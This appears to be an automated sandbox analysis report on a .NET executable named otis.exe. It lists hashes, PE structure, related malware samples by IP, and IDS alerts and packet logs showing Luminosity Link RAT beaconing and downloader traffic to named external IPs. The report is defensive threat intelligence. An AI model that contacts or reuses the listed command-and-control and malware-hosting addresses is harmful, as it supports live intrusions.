	mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
	m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
	powerpc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
	armv6l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
	sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
	x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
	mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
	sh4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
	mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
EDIS-AS-EUAT	ssowoface.dll	Get hash	malicious	Unknown	Browse	192.36.61.122
	ssowoface.dll	Get hash	malicious	Unknown	Browse	192.36.61.122
	msws.msi	Get hash	malicious	ORPCBackdoor	Browse	151.236.9.174
	msws.msi	Get hash	malicious	ORPCBackdoor	Browse	151.236.9.174
	Mcb5K3TOWT.exe	Get hash	malicious	Unknown	Browse	192.36.38.33
	987123.exe	Get hash	malicious	LummaC, Eternity Stealer, LummaC Stealer, SmokeLoader, Stealc, zgRAT	Browse	192.36.38.33
	16GAuqLUFK.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc	Browse	192.36.38.33
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	192.36.38.33
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	192.36.38.33
	XqmbvBWVRN.elf	Get hash	malicious	Mirai	Browse	37.235.56.176

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.501218592626246
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	otis.exe
File size:	22'016 bytes
MD5:	3d922c89c5f0f8f9a738bec3a24d0494
SHA1:	d5b0ad895d5adbf919ed6771292410df924fdd00
SHA256:	cb7e6640ab5c1dad5083e5790d6009c317894406b970d42a34758e99a9ff7f94
SHA512:	500f43580fd4e19cbf0c833cd44a2e92cf307ed8055a48a185da40e814cabc37204f83070da372220c8866a0c24a72b4ebae6714c8426c5d2c5d504d6c1b4d28
SSDEEP:	384:XQq1xmsrEE/FL36Rvz+MXPM0jJ/ALE4ziUtVEEAcdx+xrlCWJr:X8CEKF36RvzRJCEMgyDERCWJr
TLSH:	19A22A4DA3ACCA3BEB5F1BBD64B2436287B1D255A117FBAA8EC8F6D43C07340044456B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....X..........."...0..N...........l... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x406c9e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB658ECE9 [Sat Dec 11 08:18:49 2066 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6c4c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x298	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6c30	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4ca4	0x4e00	b7462f6534755f556cdb5f1a5d657d13	False	0.5072115384615384	data	5.766776919396873	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x298	0x400	3de4c7942443a7a75c7669f30cfda13b	False	0.2939453125	data	2.1007893131205564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	d48209f22d80462bc43cac6ca4f50c10	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8058	0x23c	data			0.46853146853146854

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-13T08:05:15.387383+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49730	TCP
2024-11-13T08:05:28.419802+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49737	192.121.170.106	6969	TCP
2024-11-13T08:05:30.239490+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49738	91.132.92.231	9314	TCP
2024-11-13T08:05:30.395781+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49739	192.121.170.106	6969	TCP
2024-11-13T08:05:32.223185+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49740	91.132.92.231	9314	TCP
2024-11-13T08:05:32.383336+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49741	192.121.170.106	6969	TCP
2024-11-13T08:05:34.237402+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49742	91.132.92.231	9314	TCP
2024-11-13T08:05:34.302832+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49743	192.121.170.106	6969	TCP
2024-11-13T08:05:36.165379+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49744	91.132.92.231	9314	TCP
2024-11-13T08:05:36.306609+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49745	192.121.170.106	6969	TCP
2024-11-13T08:05:38.174755+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49746	91.132.92.231	9314	TCP
2024-11-13T08:05:38.282732+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49747	192.121.170.106	6969	TCP
2024-11-13T08:05:44.133604+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49748	91.132.92.231	9314	TCP
2024-11-13T08:05:44.301388+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49749	192.121.170.106	6969	TCP
2024-11-13T08:05:46.204734+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49750	91.132.92.231	9314	TCP
2024-11-13T08:05:46.335595+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49751	192.121.170.106	6969	TCP
2024-11-13T08:05:48.151428+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49752	91.132.92.231	9314	TCP
2024-11-13T08:05:48.251740+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49753	192.121.170.106	6969	TCP
2024-11-13T08:05:50.100520+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49754	91.132.92.231	9314	TCP
2024-11-13T08:05:50.227877+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49755	192.121.170.106	6969	TCP
2024-11-13T08:05:52.051668+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49756	91.132.92.231	9314	TCP
2024-11-13T08:05:52.194039+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49757	192.121.170.106	6969	TCP
2024-11-13T08:05:53.447362+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49758	TCP
2024-11-13T08:05:54.029257+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49759	91.132.92.231	9314	TCP
2024-11-13T08:05:58.423770+0100	2811176	ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound	1	192.168.2.4	49766	192.121.170.106	6969	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 08:05:27.159518957 CET	49736	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:27.164380074 CET	9314	49736	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:27.164478064 CET	49736	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:27.167279005 CET	49736	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:27.172184944 CET	9314	49736	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:28.074790001 CET	9314	49736	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:28.085659981 CET	9314	49736	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:28.085756063 CET	49736	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:28.089674950 CET	49736	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:28.094825029 CET	9314	49736	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:28.094899893 CET	49736	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:28.330965996 CET	49737	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:28.335851908 CET	6969	49737	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:28.335952997 CET	49737	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:28.403536081 CET	49737	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:28.408417940 CET	6969	49737	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:28.413667917 CET	49737	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:28.419749022 CET	6969	49737	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:28.419801950 CET	49737	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:28.425446033 CET	6969	49737	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:29.276905060 CET	6969	49737	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:29.277127028 CET	49737	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:29.286072016 CET	49737	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:29.290919065 CET	6969	49737	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:29.316107035 CET	49738	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:29.320914030 CET	9314	49738	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:29.321001053 CET	49738	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:29.321250916 CET	49738	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:29.325984001 CET	9314	49738	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:30.229161978 CET	9314	49738	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:30.239419937 CET	9314	49738	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:30.239490032 CET	49738	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:30.239617109 CET	49738	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:30.245491982 CET	9314	49738	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:30.245548010 CET	49738	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:30.329960108 CET	49739	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:30.334763050 CET	6969	49739	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:30.334849119 CET	49739	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:30.343534946 CET	49739	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:30.348396063 CET	6969	49739	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:30.390959978 CET	49739	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:30.395731926 CET	6969	49739	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:30.395781040 CET	49739	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:30.400527000 CET	6969	49739	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:31.267457962 CET	6969	49739	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:31.267550945 CET	49739	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:31.269288063 CET	49739	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:31.274045944 CET	6969	49739	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:31.296567917 CET	49740	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:31.301414967 CET	9314	49740	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:31.301532030 CET	49740	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:31.301664114 CET	49740	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:31.306406021 CET	9314	49740	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:32.212677002 CET	9314	49740	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:32.223125935 CET	9314	49740	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:32.223185062 CET	49740	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:32.223265886 CET	49740	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:32.228466034 CET	9314	49740	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:32.228517056 CET	49740	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:32.326950073 CET	49741	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:32.331816912 CET	6969	49741	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:32.331895113 CET	49741	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:32.341295004 CET	49741	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:32.346143961 CET	6969	49741	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:32.378406048 CET	49741	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:32.383266926 CET	6969	49741	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:32.383336067 CET	49741	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:32.388227940 CET	6969	49741	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:33.305167913 CET	6969	49741	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:33.305258036 CET	49741	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:33.306355953 CET	49741	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:33.311887026 CET	6969	49741	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:33.328049898 CET	49742	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:33.333554983 CET	9314	49742	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:33.333638906 CET	49742	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:33.333884001 CET	49742	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:33.339397907 CET	9314	49742	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:34.227034092 CET	9314	49742	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:34.237314939 CET	9314	49742	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:34.237401962 CET	49742	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:34.237453938 CET	49742	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:34.242769957 CET	9314	49742	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:34.242827892 CET	49742	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:34.248945951 CET	49743	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:34.253751040 CET	6969	49743	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:34.253942966 CET	49743	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:34.262490034 CET	49743	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:34.267255068 CET	6969	49743	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:34.297967911 CET	49743	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:34.302758932 CET	6969	49743	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:34.302831888 CET	49743	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:34.307665110 CET	6969	49743	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:35.226387978 CET	6969	49743	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:35.226509094 CET	49743	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:35.230160952 CET	49743	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:35.235069990 CET	6969	49743	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:35.249777079 CET	49744	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:35.254719973 CET	9314	49744	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:35.254795074 CET	49744	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:35.255582094 CET	49744	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:35.260432005 CET	9314	49744	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:36.154927969 CET	9314	49744	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:36.165316105 CET	9314	49744	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:36.165379047 CET	49744	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:36.165452003 CET	49744	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:36.171235085 CET	9314	49744	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:36.171303988 CET	49744	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:36.247821093 CET	49745	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:36.252773046 CET	6969	49745	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:36.252856016 CET	49745	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:36.261929035 CET	49745	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:36.266786098 CET	6969	49745	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:36.301799059 CET	49745	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:36.306543112 CET	6969	49745	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:36.306608915 CET	49745	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:36.311414003 CET	6969	49745	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:37.235996008 CET	6969	49745	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:37.236198902 CET	49745	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:37.237138987 CET	49745	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:37.241905928 CET	6969	49745	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:37.264528036 CET	49746	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:37.269377947 CET	9314	49746	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:37.269489050 CET	49746	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:37.269653082 CET	49746	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:37.274451971 CET	9314	49746	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:38.163793087 CET	9314	49746	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:38.174320936 CET	9314	49746	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:38.174755096 CET	49746	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:38.174916983 CET	49746	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:38.180087090 CET	9314	49746	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:38.182732105 CET	49746	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:38.202047110 CET	49747	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:38.206974030 CET	6969	49747	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:38.210767984 CET	49747	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:38.222321987 CET	49747	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:38.227231979 CET	6969	49747	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:38.277864933 CET	49747	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:38.282681942 CET	6969	49747	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:38.282732010 CET	49747	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:38.287528038 CET	6969	49747	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:39.978527069 CET	6969	49747	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:39.978619099 CET	49747	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:39.979208946 CET	6969	49747	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:39.979260921 CET	49747	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:39.979338884 CET	6969	49747	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:39.979381084 CET	49747	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:39.979489088 CET	49747	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:39.984267950 CET	6969	49747	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:43.234250069 CET	49748	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:43.239145041 CET	9314	49748	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:43.239296913 CET	49748	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:43.239478111 CET	49748	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:43.244389057 CET	9314	49748	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:44.123017073 CET	9314	49748	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:44.133430958 CET	9314	49748	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:44.133604050 CET	49748	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:44.133685112 CET	49748	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:44.138780117 CET	9314	49748	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:44.138835907 CET	49748	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:44.233175993 CET	49749	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:44.238003969 CET	6969	49749	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:44.238102913 CET	49749	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:44.253307104 CET	49749	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:44.258101940 CET	6969	49749	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:44.296502113 CET	49749	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:44.301309109 CET	6969	49749	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:44.301388025 CET	49749	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:44.306180954 CET	6969	49749	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:45.179465055 CET	6969	49749	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:45.179533005 CET	49749	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:45.216290951 CET	49749	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:45.221086025 CET	6969	49749	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:45.285494089 CET	49750	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:45.290380955 CET	9314	49750	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:45.290446043 CET	49750	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:45.292557955 CET	49750	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:45.297415018 CET	9314	49750	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:46.194188118 CET	9314	49750	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:46.204577923 CET	9314	49750	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:46.204734087 CET	49750	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:46.204765081 CET	49750	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:46.210122108 CET	9314	49750	91.132.92.231	192.168.2.4
Nov 13, 2024 08:05:46.210175037 CET	49750	9314	192.168.2.4	91.132.92.231
Nov 13, 2024 08:05:46.280060053 CET	49751	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:46.285151958 CET	6969	49751	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:46.285229921 CET	49751	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:46.294198036 CET	49751	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:46.299062014 CET	6969	49751	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:46.330548048 CET	49751	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:46.335530996 CET	6969	49751	192.121.170.106	192.168.2.4
Nov 13, 2024 08:05:46.335594893 CET	49751	6969	192.168.2.4	192.121.170.106
Nov 13, 2024 08:05:46.340439081 CET	6969	49751	192.121.170.106	192.168.2.4
